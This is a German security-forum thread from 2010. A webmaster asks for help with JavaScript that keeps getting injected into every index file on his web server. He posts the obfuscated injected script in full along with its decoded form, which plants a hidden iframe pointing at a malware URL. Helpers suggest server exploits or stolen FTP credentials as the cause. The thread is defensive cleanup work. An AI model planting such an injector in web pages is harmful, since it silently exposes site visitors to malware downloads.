Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server! (https://www.trojaner-board.de/93899-unbekannter-virus-verseucht-alle-index-html-php-dateien-server.html)

Unwissender4 18.12.2010 21:36
Unbekannter Virus verseucht alle index.html/php Dateien auf dem Server!
 
Hallo Community,
derzeit setzt mich ein nervenaufreibendes Problem unter Druck.

Meine gesamten index.html und index.php Dateien auf meinem Webspace sind mit unbekannten Javascripts verseucht.
Dies hat zur Folge, das man aufgefordert wird ein Plugin für den Standard Media Player zu installieren.

Ich habe die Dateien bereits manuell heute morgen wieder repariert, sprich den Code entfernt und neu hochgeladen.
Ein wenig später tritt genau das gleiche Problem auf.
Hier der Schädlingscode vor dem schließenden </body> Tag:
Code:
<!-- ad --><script>var af="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,59*2,48.5*2,57*2,16*2,49*2,50*2,60.5*2,16*2,30.5*2,16*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49.5*2,57*2,50.5*2,48.5*2,58*2,50.5*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,20*2,17*2,49*2,55.5*2,50*2,60.5*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,58*2,57*2,60.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5*2,54*2,50*2,20*2,49*2,50*2,60.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,49.5*2,48.5*2,58*2,49.5*2,52*2,16*2,20*2,50.5*2,20.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,49*2,55.5*2,50*2,60.5*2,16*2,30.5*2,16*2,49*2,50*2,60.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,16*2,50.5*2,54*2,57.5*2,50.5*2,16*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,59.5*2,57*2,52.5*2,58*2,50.5*2,20*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,62.5*2,6.5*2,4.5*2,4.5*2,51*2,58.5*2,55*2,49.5*2,58*2,52.5*2,55.5*2,55*2,16*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,57*2,20*2,20.5*2,61.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2,55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2,51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5*2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2,39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2,50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2,52.5*2,55*2,55*2,50.5*2,57*2,36*2,42*2,38.5*2,38*2,16*2,21.5*2,30.5*2,16*2,17*2,30*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,16*2,57.5*2,57*2,49.5*2,30.5*2,19.5*2,52*2,58*2,58*2,56*2,29*2,23.5*2,23.5*2,51.5*2,50.5*2,55.5*2,56*2,55.5*2,61*2,52.5*2,58*2,52.5*2,59*2,23*2,49.5*2,55.5*2,54.5*2,23.5*2,54.5*2,50.5*2,54*2,54*2,23.5*2,49.5*2,58*2,53*2,55*2,49*2,58*2,52.5*2,23*2,56*2,52*2,56*2,19.5*2,16*2,59.5*2,52.5*2,50*2,58*2,52*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,52*2,50.5*2,52.5*2,51.5*2,52*2,58*2,30.5*2,19.5*2,24.5*2,24*2,19.5*2,16*2,57.5*2,58*2,60.5*2,54*2,50.5*2,30.5*2,19.5*2,59*2,52.5*2,57.5*2,52.5*2,49*2,52.5*2,54*2,52.5*2,58*2,60.5*2,29*2,16*2,52*2,52.5*2,50*2,50*2,50.5*2,55*2,29.5*2,19.5*2,31*2,30*2,23.5*2,52.5*2,51*2,57*2,48.5*2,54.5*2,50.5*2,31*2,17*2,29.5*2,6.5*2,4.5*2,4.5*2,62.5*2".split(",");qtr=new Date(2010,11,5);var xvj="";var hspd="e"+(parseInt(qtr.getMonth())-1)+"a"+xvj+"l";mdco=(function(){return this;})();biwp=mdco[hspd.replace("10","v")];bqp=window['String'].fromCharCode;var wc='';for(var i=0;i<af.length;i++){wc+=bqp(biwp(af[i]));}
biwp(wc);</script><!-- /ad -->
Decodiert:
Code:
if (document.getElementsByTagName('body')[0]){
  iframer();
  } else {
  var bdy = document.createElement("body");
  try {
    document.appendChild(bdy);
  } catch (e) {
    document.body = bdy;
  }
  if (document.getElementsByTagName('body')[0]){
    iframer();
  } else {
    document.write("<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>");
  }
  }
  function iframer(){
  document.getElementsByTagName('body')[0].innerHTML += "<iframe src='hxxp://geopozitiv.com/mell/ctjnbti.php' width='10' height='10' style='visibility: hidden;'></iframe>";
  }
Danke für alle Tipps und Hinweise.

mfg,
unwissender4

BataAlexander 18.12.2010 22:02
Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.

Unwissender4 18.12.2010 22:50
Zitat:
Zitat von BataAlexander (Beitrag 600229)
Editier mal den Post von Dir und entfern die links bitte.

Schick mir doch mal ne PN mit Deiner Webseite.
Ich kann den Beitrag seit der Verschiebung nicht mehr editieren, tut mir Leid.
PN mit Link ist raus, die index Datei wurde aber wieder von mir bereinigt.

Ich habe auch aus Sicherheitsgründen das FTP-Programm gewechselt, sowie die FTP-Accounts gelöscht.

mfg

BataAlexander 18.12.2010 23:30
Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.

Unwissender4 19.12.2010 14:11
Zitat:
Zitat von BataAlexander (Beitrag 600245)
Auf der Seite selber kann ich erst mal nichts feststellen.
Es kann imho liegen an
- schlecht konfigurierter Web Server, Schwachstellen werden aktiv ausgenutzt.
Mal im Benutzermenü Deines Providers versuchen herauszufinden, auf was der Server läuft, sind da noch andere Oberflächen installiert? Jommala oder Typo Exploids erlauben in einigen Fällen vollen Root Zugriff.
- Jemand hat Zugriff auf Deinen Rechner. In Dem Fall mal das System scannen wie von Larusso und der Load.exe beschrieben und die Ergebnisse posten.
Momentan taucht das Problem nicht mehr auf, seitdem ich meine FTP-Kontos gelöscht und mit einem neuen Passwort wieder erstellt habe.
Zudem benutze ich auch keine veralteten CM-Systeme, sondern selbst entwickelte Frontends.

Meine index Dateien habe ich manuell wieder auf Vordermann gebracht, den Hoster bereits informiert.
Normalerweise tritt das Problem sonst eigentlich immer nach 1-2 Stunden wieder auf, scheint also gelöst zu sein.
Ansonsten werde ich mich nochmal zu Wort melden.

Ich bedanke für deine Bemühungen, und wünsche dir noch ein frohes Weihnachtsfest ;)

mfg


Alle Zeitangaben in WEZ +1. Es ist jetzt 08:49 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129